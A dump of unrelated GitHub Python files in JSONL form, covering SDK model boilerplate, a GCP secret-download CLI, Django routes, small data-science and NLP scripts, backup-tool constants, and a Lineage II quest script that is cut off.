self.items():\r\n result[key] = value\r\n\r\n return result\r\n\r\n def to_str(self):\r\n \"\"\"Returns the string representation of the model\"\"\"\r\n return pprint.pformat(self.to_dict())\r\n\r\n def __repr__(self):\r\n \"\"\"For `print` and `pprint`\"\"\"\r\n return self.to_str()\r\n\r\n def __eq__(self, other):\r\n \"\"\"Returns true if both objects are equal\"\"\"\r\n if not isinstance(other, ApplicationType):\r\n return False\r\n\r\n return self.__dict__ == other.__dict__\r\n\r\n def __ne__(self, other):\r\n \"\"\"Returns true if both objects are not equal\"\"\"\r\n return not self == other\r\n\r\n","repo_name":"DeepSecurityHealthCheck/HealthCheckCore","sub_path":"vendor/SDK/deepsecurity/models/application_type.py","file_name":"application_type.py","file_ext":"py","file_size_in_byte":13892,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"20688756306","text":"import argparse\r\nimport gc_cryption\r\nimport gc_storage\r\nimport gc_path\r\n\r\n\r\ndef download_secret(secret_name,\r\n project_name,\r\n bucket_name,\r\n keyring_name,\r\n key_name,\r\n *args, **kwargs\r\n ):\r\n bucket = gc_storage.get_bucket(bucket_name)\r\n full_file_name = 'secrets/{}'.format(\r\n # Assume that any encrypted file\r\n # ends with '.encrypted'.\r\n gc_path.set_extension(secret_name)\r\n )\r\n secret_blob = bucket.blob(full_file_name)\r\n\r\n ciphertext = secret_blob.download_as_string()\r\n plaintext = gc_cryption.decrypt_secret(\r\n ciphertext,\r\n project_name,\r\n keyring_name,\r\n key_name\r\n )\r\n\r\n if kwargs['out']:\r\n file_path = gc_path.solve_file_path(secret_name, kwargs['out'])\r\n gc_path.save_to_file(file_path, plaintext, create_dir=True)\r\n else:\r\n print(plaintext)\r\n\r\n\r\ndef _get_argparser(start_function):\r\n argparser = argparse.ArgumentParser()\r\n argparser.set_defaults(method=start_function)\r\n\r\n argparser.add_argument(\r\n 'secret_name',\r\n help='Name of secret file to download.\\n' +\r\n 'Assume file name to end with \\'.encrypted\\'.'\r\n )\r\n argparser.add_argument(\r\n 'project_name',\r\n help='Name of GCP Project.'\r\n )\r\n argparser.add_argument(\r\n 'bucket_name',\r\n help='Name of GCP bucket where your secrets are found.'\r\n )\r\n argparser.add_argument(\r\n 'keyring_name',\r\n help='Name of GCP keyring where your cryptokey is located.'\r\n )\r\n argparser.add_argument(\r\n 'key_name',\r\n help='Name of GCP cryptokey.'\r\n )\r\n argparser.add_argument(\r\n '--out',\r\n help='If specified, save the decrypted plaintext' +\r\n ' to the given path.'\r\n )\r\n\r\n return argparser\r\n\r\n\r\ndef main():\r\n argparser = _get_argparser(start_function=download_secret)\r\n args = argparser.parse_args()\r\n args.method(**vars(args))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"knowit/hlf","sub_path":"secrets_handler/download_secret.py","file_name":"download_secret.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74223823208","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^registration_attempt$', views.register),\n url(r'^login_attempt$', views.login),\n url(r'^success$', views.success),\n url(r'^books/add$', views.add),\n url(r'^make_book_entry$', views.make_book_entry),\n url(r'^book/(?P\\d+)$', views.display_book),\n url(r'^logout$', views.logout),\n url(r'^home$', views.home),\n url(r'^user/(?P\\d+)$', views.show_user),\n url(r'^destroy/(?P\\d+)/(?P\\d+)$', views.destroy),\n url(r'^add_review$', views.add_review),\n]\n","repo_name":"cd-chicago-june-cohort/jp-django","sub_path":"belt_reviewer/apps/book_reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24391554866","text":"import os\nimport subprocess\n\nfrom django.db import connections\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom django.core.management.base import CommandError\n\nfrom django.db.utils import ConnectionDoesNotExist\n\n\nclass Command(BaseCommand):\n help = 'Acts as an entrypoint for the database in docker, from the app container'\n\n def add_arguments(self, parser):\n parser.add_argument('--database',\n action='store',\n dest='database',\n default='default',\n help='Database connection name')\n parser.add_argument('--recreate',\n dest='recreate',\n action='store_true')\n\n def handle(self, *args, **options):\n call_command('wait_for_database', database=options['database'])\n\n try:\n connection = connections[options['database']]\n connection.cursor()\n\n except ConnectionDoesNotExist:\n raise CommandError('Database \"%s\" does not exist in '\n 'settings' % options['database'])\n\n if options['recreate']:\n call_command('recreate_database')\n\n self.stdout.write('Running migrations')\n call_command('migrate', no_input=True)\n\n self.stdout.write('Loading fixtures')\n fixtures = [\n 'apps/core/fixtures/initial_data.json',\n 'apps/user/fixtures/user_data.json',\n ]\n call_command('loaddata', *fixtures)\n","repo_name":"motius/django-api","sub_path":"apps/utils/management/commands/db_entrypoint.py","file_name":"db_entrypoint.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9822267279","text":"conjunto = {1, 2, 3, 4, 4, 5, 5, 6, 6}\nconjunto2 = {7, 8, 9, 10, 1, 2}\nuniaoConjunto = conjunto.union(conjunto2)\nconjuntoInterseccao = conjunto.intersection(conjunto2)\nconjuntoDiferenca = conjunto.difference(conjunto2)\nconjuntoDiferenca2 = conjunto2.difference(conjunto)\ndiferencaSimetrica = conjunto.symmetric_difference(conjunto2)\n\n\nprint('União dos conjuntos {}'.format(uniaoConjunto))\nprint('Intersecção dos conjuntos {}'.format(conjuntoInterseccao))\nprint('Diferença entre 1 e 2 {}'.format(conjuntoDiferenca))\nprint('Diferença entre 2 e 1 {}'.format(conjuntoDiferenca2))\nprint('Diferença simetrica {}'.format(diferencaSimetrica))\n\nconjuntoA = {1, 2, 3}\nconjuntoB = {1, 2, 3, 4, 5}\nconjunto_subset = conjuntoA.issubset(conjuntoB)\nconjunto_subsetA = conjunto.issubset(conjuntoA)\n\n\nprint('O conjunto A é um Subconjunto do conjunto B?{}'.format(conjunto_subset))\nprint('O conjunto B é um Subconjunto do conjunto A?{}'.format(conjunto_subsetA))\n\n#O conjunto não pode conter mais de um elemento igual\n\n\nlista = ['cachorro', 'gato', 'cachorro', 'elefante'] \nconjuntoAnimais = set(lista) #Transformando lista em conjunto\nprint(conjuntoAnimais)\n\n\n \n","repo_name":"Adsandro/DIO-Python","sub_path":"Estudos/conjunto.py","file_name":"conjunto.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5982682434","text":"import pandas as pd\r\nfrom pgmpy.models import BayesianNetwork\r\nfrom pgmpy.estimators import ParameterEstimator\r\nfrom pgmpy.estimators import MaximumLikelihoodEstimator\r\nfrom pgmpy.inference import VariableElimination\r\n\r\n# Define the dataset\r\ndata = pd.DataFrame({\r\n 'Weather': ['Sunny', 'Sunny', 'Overcast', 'Rainy', 'Rainy', 'Overcast', 'Sunny', 'Sunny', 'Rainy', 'Sunny', 'Overcast', 'Overcast', 'Rainy'],\r\n 'Temperature': ['Hot', 'Hot', 'Hot', 'Mild', 'Cool', 'Cool', 'Mild', 'Cool', 'Mild', 'Mild', 'Mild', 'Hot', 'Mild'],\r\n 'Humidity': ['High', 'High', 'High', 'High', 'Normal', 'Normal', 'High', 'Normal', 'Normal', 'Normal', 'High', 'Normal', 'High'],\r\n 'PlayTennis': ['No', 'No', 'Yes', 'Yes', 'Yes', 'Yes', 'No', 'Yes', 'Yes', 'Yes', 'Yes', 'Yes', 'No']\r\n})\r\n\r\n# Create a Bayesian Network model\r\nmodel = BayesianNetwork()\r\n\r\n# Define the variables based on the columns in the dataset\r\nvariables = list(data.columns)\r\n\r\n# Add nodes (variables) to the model with the correct names\r\nfor variable in variables:\r\n model.add_node(variable)\r\n\r\n# Define the structure (directed edges) of the Bayesian network\r\nmodel.add_edge(\"Weather\", \"PlayTennis\")\r\nmodel.add_edge(\"Temperature\", \"PlayTennis\")\r\nmodel.add_edge(\"Humidity\", \"PlayTennis\")\r\n\r\n# Use Maximum Likelihood Estimation (MLE) to estimate CPDs from the data\r\nestimator = ParameterEstimator(model, data)\r\nmodel.fit(data, estimator=MaximumLikelihoodEstimator)\r\n\r\n# Check the model for consistency\r\nassert model.check_model()\r\n\r\n# Create an inference object using Variable Elimination\r\ninference = VariableElimination(model)\r\n\r\n# Perform inference to calculate probabilities\r\n\r\n# Calculate the probability of playing tennis given certain conditions\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Weather': 'Sunny'})\r\nprint(\"Probability of playing tennis given Sunny weather:\")\r\nprint(result)\r\n\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Temperature': 'Mild', 'Humidity': 'Normal'})\r\nprint(\"\\nProbability of playing tennis given Mild temperature and Normal humidity:\")\r\nprint(result)\r\n\r\n# You can perform more inference queries as needed\r\n# Calculate the probability of playing tennis given Rainy weather\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Weather': 'Rainy'})\r\nprint(\"\\nProbability of playing tennis given Rainy weather:\")\r\nprint(result)\r\n\r\n# Calculate the probability of playing tennis given Cool temperature\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Temperature': 'Cool'})\r\nprint(\"\\nProbability of playing tennis given Cool temperature:\")\r\nprint(result)\r\n\r\n# Calculate the probability of playing tennis given Overcast weather and High humidity\r\nresult = inference.query(variables=['PlayTennis'], evidence={'Weather': 'Overcast', 'Humidity': 'High'})\r\nprint(\"\\nProbability of playing tennis given Overcast weather and High humidity:\")\r\nprint(result)\r\n","repo_name":"Dragoon-galaxy/AI_practicals","sub_path":"6_Bayesian _net_infer.py","file_name":"6_Bayesian _net_infer.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19220500510","text":"import mysql.connector\nfrom mysql.connector import Error\nimport pandas as pd\nfrom constant import *\n\ncolumns = [\"First naem\", \"Last name\"]\nnew_result = []\n\ndef create_server_connection(host_name, user_name, user_password, db_name):\n connection = None\n try:\n connection = mysql.connector.connect(\n host = host_name,\n user = user_name,\n passwd = user_password,\n database = db_name\n )\n print(\"MySQL Database connection successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n return connection\n\n\ndef execute_query(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print(\"Query executed successfully\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\ndef execute_read_query(connection, query):\n cursor = connection.cursor()\n result = None\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n print(\"Query executed successfully\")\n return result\n except Error as err:\n print(f\"Error: '{err}'\")\n\n\ncreate_table_query = \"\"\"\nCREATE TABLE Staff(\n\tstaffNo VARCHAR(4) PRIMARY KEY,\n\tfName VARCHAR(25) NOT NULL,\n\tlName VARCHAR(25) NOT NULL,\n\tposition VARCHAR(15) NOT NULL,\n\tdob DATE NOT NULL,\n\tsalary DECIMAL(7,2) NOT NULL,\n\tbranchNo VARCHAR(4),\n\tFOREIGN KEY (branchNo) REFERENCES Branch(branchNo)\n) ENGINE INNODB;\n\"\"\"\n\ninsert_staff = \"\"\"\nINSERT INTO Staff (staffNo, fName, lName, position,dob, salary, branchNo)\nVALUES ('SL21', 'John', 'White', 'Manager', '1945-10-01', 30000, 'B005'),\n ('SG37', 'Ann', 'Beech', 'Assistant', '1960-11-10', 12000, 'B003'),\n ('SG14', 'David', 'Ford', 'Supervisor', '1958-03-24', 18000, 'B003'),\n ('SA9', 'Mary', 'Howe', 'Assistant', '1970-02-19',9000, 'B007'),\n ('SG5', 'Susan', 'Brand', 'Manager', '1940-06-03', 24000, 'B003'),\n ('SL41', 'Julie', 'Lee', 'Assistant', '1965-06-13', 9000, 'B005');\n\"\"\"\n\nselect_staff = \"\"\"\nSELECT fName, lName FROM Staff;\n\"\"\"\n\ndelete_staff = \"\"\"\nDELETE FROM Staff WHERE staffNo = 'SL41';\n\"\"\"\n\nconnection = create_server_connection(\"localhost\",\"root\",PASSWORD,\"bank\")\nexecute_query(connection, create_table_query)\nexecute_query(connection, insert_staff)\nresults = execute_read_query(connection, select_staff)\nexecute_query(connection, delete_staff)\nresults = execute_read_query(connection, select_staff)\n\nfor result in results:\n result = list(result)\n new_result.append(result)\n\n\ndf = pd.DataFrame(new_result, columns=columns)\nprint(df)","repo_name":"MiDev7/CST1510","sub_path":"week20_M00931468/Typical/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5429672128","text":"import numpy as np\r\nfrom PIL import Image\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\r\n\r\n#importing text\r\nmarcetFile = open(\"C:\\\\Users\\\\chris\\\\Documents\\\\GitHub\\\\Political-Economy-Word-Clouds\\\\marcetConversations.txt\", \"r\", encoding=\"utf-8\")\r\nmarcetTxt = marcetFile.read()\r\n\r\n#defining words to exclude\r\nstopwords = set(STOPWORDS)\r\nstopwords.update([\"will\", \"may\", \"must\"])\r\n\r\n#importing image\r\nmarcetMask = np.array(Image.open(\"C:\\\\Users\\\\chris\\\\Documents\\\\GitHub\\\\Political-Economy-Word-Clouds\\\\marcet.png\"))\r\n\r\n#generating word cloud\r\nmarcet_wc = WordCloud(font_path=\"C:\\\\WINDOWS\\\\FONTS\\\\sylfaen.TTF\", max_words = 100000, mask = marcetMask, stopwords=stopwords, background_color=None, mode = \"RGBA\")\r\nmarcet_wc.generate(marcetTxt)\r\n\r\n#generating colors from image\r\nimage_colors = ImageColorGenerator(marcetMask)\r\nplt.imshow(marcet_wc.recolor(color_func=image_colors), interpolation=\"bilinear\")\r\n\r\n#saving and showing word cloud\r\nplt.axis(\"off\")\r\nplt.savefig(\"C:\\\\Users\\\\chris\\\\Documents\\\\GitHub\\\\Political-Economy-Word-Clouds\\\\marcetCloud.png\", transparent=True, dpi = 300)\r\nplt.show()\r\n\r\n#closing text\r\nmarcetFile.close()\r\n","repo_name":"chrissimmerman/Political-Economy-Word-Clouds","sub_path":"programs/marcetProgram.py","file_name":"marcetProgram.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11159027811","text":"import os\nimport pickle\nfrom nltk.tokenize import sent_tokenize\nfrom transformers import AutoTokenizer\n\n'''\nFormat the summary article pairs in the modified dataset\nso that they can be fed to the BERTSum model.\n'''\n\ndef get_sentence_token_ids(text, tokenizer, sentences=None):\n # Split the text into tokens by mapping the index of original text to index of tokens\n sents = sent_tokenize(text)\n # get start and end index for each sentence from the plain text\n start = []\n for s in sents:\n if len(start) != 0:\n start.append(text[start[-1]:].index(s) + start[-1]) # add sentences sequentially\n else:\n start.append(text.index(s))\n end = [start[i] for i in range(1, len(start))] + [len(text)]\n \n encoded = tokenizer(text, max_length=512, truncation=True) \n\n tok_s = []\n tok_e = []\n for s, e in zip(start, end):\n for i, t in enumerate(encoded.tokens()):\n try:\n ids = encoded.token_to_chars(i) # start token\n except TypeError:\n ids = None\n if ids == None:\n continue\n ss = ids.start\n ee = ids.end\n if ss == s:\n tok_s.append(i)\n break\n tok_e = [s for s in tok_s[1:]] + [len(encoded.tokens())]\n\n assert(len(tok_s) == len(tok_e))\n #assert(len(tok_s) == len(sents))\n \n if sentences is not None: # select starts and ends for specific sentences\n tok_ss = []\n tok_ee = []\n sents = sentences\n start_sel = [text.index(s) for s in sents]\n for s in start_sel:\n for i, t in enumerate(encoded.tokens()):\n ids = encoded.token_to_chars(i)\n if ids == None:\n continue\n ss = ids.start\n ee = ids.end\n if ss == s:\n tok_ss.append(i)\n tok_ee = [tok_e[tok_s.index(s)] for s in tok_ss]\n tok_s = tok_ss\n tok_e = tok_ee\n assert(len(tok_s) == len(tok_e))\n assert(len([x for x in tok_s if x > 512]) == 0)\n assert(len([x for x in tok_e if x > 512]) == 0)\n return sents, tok_s, tok_e\n\ndef truncate_doc(text, tokenizer):\n text_sent, tok_s, tok_e = get_sentence_token_ids(text, tokenizer)\n\n # get sentences up to 512 token length\n valid = []\n for i, e in enumerate(tok_e):\n if e <= 512:\n valid.append(i)\n text_sent = [text_sent[i] for i in valid]\n return ' '.join(text_sent), text_sent\n\nif __name__ == '__main__':\n fnames = [\n 'easy-ans-samples-cnndm.pkl',\n 'hard-ans-samples-cnndm.pkl',\n ]\n\n model_name = \"sshleifer/distilbart-cnn-12-6\"\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n \n for fname in fnames:\n print('-- processing file: {}'.format(fname))\n output_dir = os.path.join('..', fname.split('.')[0])\n print('---> saving output in : {}'.format(output_dir))\n \n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n text_info = pickle.load(open(fname, 'rb'))\n idx = list(text_info.keys())\n for i in idx:\n s0 = text_info[i]['original_text']\n s1 = text_info[i]['wrong_text'][0]\n s2 = text_info[i]['wrong_text'][1]\n \n # truncate document to match the max token length\n s0, s0_sents = truncate_doc(s0, tokenizer)\n s1, s1_sents = truncate_doc(s1, tokenizer)\n s2, s2_sents = truncate_doc(s2, tokenizer)\n\n ## preprocess for BERTSum input format\n\n # split into sentences with specific format required by the method\n # sentence split by specific tokens\n par = lambda s : ' [CLS] [SEP] '.join(s)\n s0 = par(s0_sents)\n s1 = par(s1_sents)\n s2 = par(s2_sents)\n\n # write each document a a file (labeled with 0-2)\n ff = 'sample-%d_0.txt'%i\n with open(os.path.join(output_dir, ff), 'w') as f:\n f.write(s0)\n ff = 'sample-%d_1.txt'%i\n with open(os.path.join(output_dir, ff), 'w') as f:\n f.write(s1)\n ff = 'sample-%d_2.txt'%i\n with open(os.path.join(output_dir, ff), 'w') as f:\n f.write(s2)\n","repo_name":"wnstlr/document-matching","sub_path":"bertsum_scripts/get_samples_bertsum.py","file_name":"get_samples_bertsum.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21832175775","text":"from pydantic import BaseModel\n\nclass Person(BaseModel):\n first: str\n last: str\n zip_code: str\n \n \n def __str__(self) -> str:\n return \"%s %s: %s\" % (self.first, self.last, self.zip_code)\n \nperson_dict = {\n \"first\": \"Bruce\",\n \"last\": \"wayne\",\n \"zip_code\": \"10021\"\n} \n \nperson = Person(**person_dict)\n\n \nprint(person)","repo_name":"Awodi-Emmanuel/Fastapi","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71484330727","text":"import os\nfrom typing import List, Generator\n\ndef parse_input(file_name: str) -> List[str]:\n with open(file_name) as f:\n return [line.strip().replace(' ', '') for line in f.readlines()]\n\ndef problem_iterator(problem: str) -> Generator[str, None, None]:\n for letter in list(problem):\n yield letter\n\ndef calculate_problem(problem: str) -> int:\n def _helper(p_it: Generator[str, None, None]) -> int:\n lhs = next(p_it)\n if lhs == ')':\n lhs = _helper(p_it)\n else:\n lhs = int(lhs)\n\n try:\n op = next(p_it)\n if op == '(':\n return lhs\n rhs = _helper(p_it)\n return eval(f'{lhs}{op}{rhs}')\n except:\n return lhs\n\n it = problem_iterator(problem[::-1])\n return _helper(it)\n\ndef calculate_answer(problems: List[str]) -> int:\n return sum([calculate_problem(p) for p in problems])\n\nif __name__ == '__main__':\n dir_path = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(dir_path, 'input.txt')\n problems = parse_input(file_path)\n answer = calculate_answer(problems)\n print(answer)","repo_name":"nagybalint/advent-of-code-2020","sub_path":"day_18/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4189993807","text":"from chat.views import GroupGeneral, GroupInterns, WebSocketGeneral, WebSocketInterns\nfrom auth.views import Login\n\nroutes = [\n\t('GET', '/', GroupGeneral, 'general'),\n\t('GET', '/interns', GroupInterns, 'interns'),\n\t('GET', '/wsgeneral', WebSocketGeneral, 'wsgeneral'),\n\t('GET', '/wsinterns', WebSocketInterns, 'wsinterns'),\n\t('GET', '/login', Login, 'login')\n]","repo_name":"temirrr/AsyncIO-Message-App","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29933291009","text":"import os\nimport sys\nimport getpass\nimport pathlib\nfrom enum import Enum, auto\n\nMSWINDOWS = sys.platform.startswith('win')\nLINUX = sys.platform.startswith('linux')\nDARWIN = sys.platform == 'darwin'\nIS_FLATPAK = os.path.exists('/.flatpak-info')\n\nif MSWINDOWS:\n UID = 1\n ROOTDRIVE = os.path.splitdrive(sys.argv[0])[0]\nelse:\n UID = os.getuid()\n\ntry:\n USER = getpass.getuser()\nexcept ImportError:\n USER = False\n\n# Paths\nINSTALL_DIR = os.path.abspath(os.path.dirname(__file__))\nUSERHOME = pathlib.Path.home()\n\nLOC = USERHOME.joinpath('.fwbackups') # The fwbackups configuration directory\nSETLOC = LOC.joinpath('Sets') # The location to store set configuration files\nONETIMELOC = LOC.joinpath('fwbackups-OneTime.conf') # The location to store the one-time backup configuration file\nPREFSLOC = LOC.joinpath('fwbackups-prefs.conf') # The location of the preferences file\nRESTORELOC = LOC.joinpath('fwbackups-Restore.conf') # The location to store the restore configuration file\nLOGLOC = LOC.joinpath('fwbackups-userlog.txt') # The location to store the log file\n\ntry: # because Windows doesn't do exit codes properly...\n EXIT_STATUS_OK = os.EX_OK\nexcept AttributeError: # ... we need this thing.\n EXIT_STATUS_OK = 0\n\nCRON_SIGNATURE = \"# autogenerated by fwbackups\"\n\n\nclass EventType(Enum):\n BACKUP_STARTED = auto()\n BACKUP_COMPLETE = auto()\n BACKUP_ERROR = auto()\n BACKUP_CANCELLED = auto()\n RESTORE_STARTED = auto()\n RESTORE_COMPLETE = auto()\n RESTORE_ERROR = auto()\n RESTORE_CANCELLED = auto()\n\n\ndef ConvertPath(path):\n \"\"\"Makes a path portable.\"\"\"\n if MSWINDOWS and path[1:3] != ':\\\\':\n path = '%s\\\\%s' % (ROOTDRIVE, path)\n return os.path.normpath(path)\n","repo_name":"stewartadam/fwbackups","sub_path":"fwbackups/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"53"} +{"seq_id":"36416723670","text":"# Made by Kerberos v1.0 on 2009/05/10\n# this script is part of the Official L2J Datapack Project.\n\nimport sys\nimport time\n\nfrom com.it.br.gameserver.ai import CtrlIntention\nfrom com.it.br.gameserver.model.quest\t\t\timport State\nfrom com.it.br.gameserver.model.quest\t\t\timport QuestState\nfrom com.it.br.gameserver.model.quest.jython\t\timport QuestJython as JQuest\nfrom com.it.br.gameserver.network.serverpackets import NpcSay\n\nqn = \"25_HidingBehindTheTruth\"\n\n# Npcs\nAgripel = 31348\nBenedict = 31349\nWizard = 31522\nTombstone = 31531\nLidia = 31532\nBookshelf = 31533\nBookshelf2 = 31534\nBookshelf3 = 31535\nCoffin = 31536\nTriol = 27218\n\n# Items\nContract = 7066\nDress = 7155\nSuspiciousTotem = 7156\nGemstoneKey = 7157\nTotemDoll = 7158\n\nclass Quest (JQuest) :\n def __init__(self,id,name,descr):\n JQuest.__init__(self,id,name,descr)\n self.questItemIds = [SuspiciousTotem,GemstoneKey,TotemDoll,Dress]\n\n\n def onAdvEvent (self,event,npc, player) :\n st = player.getQuestState(qn)\n if not st: return\n htmltext = event\n if event == \"31349-02.htm\" :\n st.playSound(\"ItemSound.quest_accept\")\n st.set(\"cond\",\"1\")\n st.setState(State.STARTED)\n elif event == \"31349-03.htm\" :\n if st.getQuestItemsCount(SuspiciousTotem) :\n htmltext = \"31349-05.htm\"\n else :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"2\")\n elif event == \"31349-10.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"4\")\n elif event == \"31348-02.htm\" :\n st.takeItems(SuspiciousTotem,-1)\n elif event == \"31348-07.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"5\")\n st.giveItems(GemstoneKey,1)\n elif event == \"31522-04.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"6\")\n elif event == \"31535-03.htm\" :\n if st.getInt(\"step\") == 0:\n st.set(\"step\",\"1\")\n triol = st.addSpawn(Triol,59712,-47568,-2712,0,0,300000,1)\n time.sleep(1)\n triol.broadcastPacket(NpcSay(triol.getObjectId(), 0, triol.getNpcId(), \"That box was sealed by my master. Don't touch it!\"))\n triol.setRunning()\n triol.addDamageHate(player,0,999)\n triol.getAI().setIntention(CtrlIntention.AI_INTENTION_ATTACK, player)\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"7\")\n elif st.getInt(\"step\") == 2:\n htmltext = \"31535-04.htm\"\n elif event == \"31535-05.htm\" :\n st.giveItems(Contract,1)\n st.takeItems(GemstoneKey,-1)\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"9\")\n elif event == \"31532-02.htm\" :\n st.takeItems(Contract,-1)\n elif event == \"31532-06.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"11\")\n elif event == \"31531-02.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"12\")\n st.addSpawn(Coffin,60104,-35820,-664,0,0,20000,1)\n elif event == \"31532-18.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"15\")\n elif event == \"31522-12.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"16\")\n elif event == \"31348-10.htm\" :\n st.takeItems(TotemDoll,-1)\n elif event == \"31348-15.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"17\")\n elif event == \"31348-16.htm\" :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"18\")\n elif event == \"31532-20.htm\" :\n st.giveItems(905,2)\n st.giveItems(874,1)\n st.takeItems(7063,-1)\n st.addExpAndSp(572277,53750)\n st.unset(\"cond\")\n st.exitQuest(False)\n st.playSound(\"ItemSound.quest_finish\")\n elif event == \"31522-15.htm\" :\n st.giveItems(936,1)\n st.giveItems(874,1)\n st.takeItems(7063,-1)\n st.addExpAndSp(572277,53750)\n st.unset(\"cond\")\n st.exitQuest(False)\n st.playSound(\"ItemSound.quest_finish\")\n return htmltext\n\n\n def onTalk (self,npc,player):\n htmltext = \"You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.\"\n st = player.getQuestState(qn)\n if not st : return htmltext\n npcId = npc.getNpcId()\n id = st.getState()\n cond = st.getInt(\"cond\")\n if id == State.COMPLETED:\n htmltext = \"This quest has already been completed.\"\n elif id == State.CREATED:\n if npcId == Benedict:\n st2 = st.getPlayer().getQuestState(\"24_InhabitantsOfTheForrestOfTheDead\")\n if st2 and st2.getState() == State.COMPLETED and player.getLevel() >= 66 :\n htmltext = \"31349-01.htm\"\n else :\n htmltext = \"31349-00.htm\"\n elif id == State.STARTED:\n if npcId == Benedict:\n if cond == 1 :\n htmltext = \"31349-02.htm\"\n elif cond in [2,3] :\n htmltext = \"31349-04.htm\"\n elif cond == 4 :\n htmltext = \"31349-10.htm\"\n elif npcId == Wizard:\n if cond == 2 :\n htmltext = \"31522-01.htm\"\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"3\")\n st.giveItems(SuspiciousTotem,1)\n elif cond == 3 :\n htmltext = \"31522-02.htm\"\n elif cond == 5 :\n htmltext = \"31522-03.htm\"\n elif cond == 6 :\n htmltext = \"31522-04.htm\"\n elif cond == 9 :\n htmltext = \"31522-05.htm\"\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"10\")\n elif cond == 10 :\n htmltext = \"31522-05.htm\"\n elif cond == 15 :\n htmltext = \"31522-06.htm\"\n elif cond == 16 :\n htmltext = \"31522-13.htm\"\n elif cond == 17 :\n htmltext = \"31522-16.htm\"\n elif cond == 18 :\n htmltext = \"31522-14.htm\"\n elif npcId == Agripel:\n if cond == 4 :\n htmltext = \"31348-01.htm\"\n elif cond == 5 :\n htmltext = \"31348-08.htm\"\n elif cond == 16 :\n htmltext = \"31348-09.htm\"\n elif cond == 17 :\n htmltext = \"31348-17.htm\"\n elif cond == 18 :\n htmltext = \"31348-18.htm\"\n elif npcId == Bookshelf:\n if cond == 6 :\n htmltext = \"31533-01.htm\"\n elif npcId == Bookshelf2:\n if cond == 6 :\n htmltext = \"31534-01.htm\"\n elif npcId == Bookshelf3:\n if cond in [6,7,8] :\n htmltext = \"31535-01.htm\"\n elif cond == 9 :\n htmltext = \"31535-06.htm\"\n elif npcId == Lidia:\n if cond == 10 :\n htmltext = \"31532-01.htm\"\n elif cond in [11,12] :\n htmltext = \"31532-06.htm\"\n elif cond == 13 :\n htmltext = \"31532-07.htm\"\n st.set(\"cond\",\"14\")\n st.takeItems(Dress,-1)\n elif cond == 14 :\n htmltext = \"31532-08.htm\"\n elif cond == 15 :\n htmltext = \"31532-18.htm\"\n elif cond == 17 :\n htmltext = \"31532-19.htm\"\n elif cond == 18 :\n htmltext = \"31532-21.htm\"\n elif npcId == Tombstone:\n 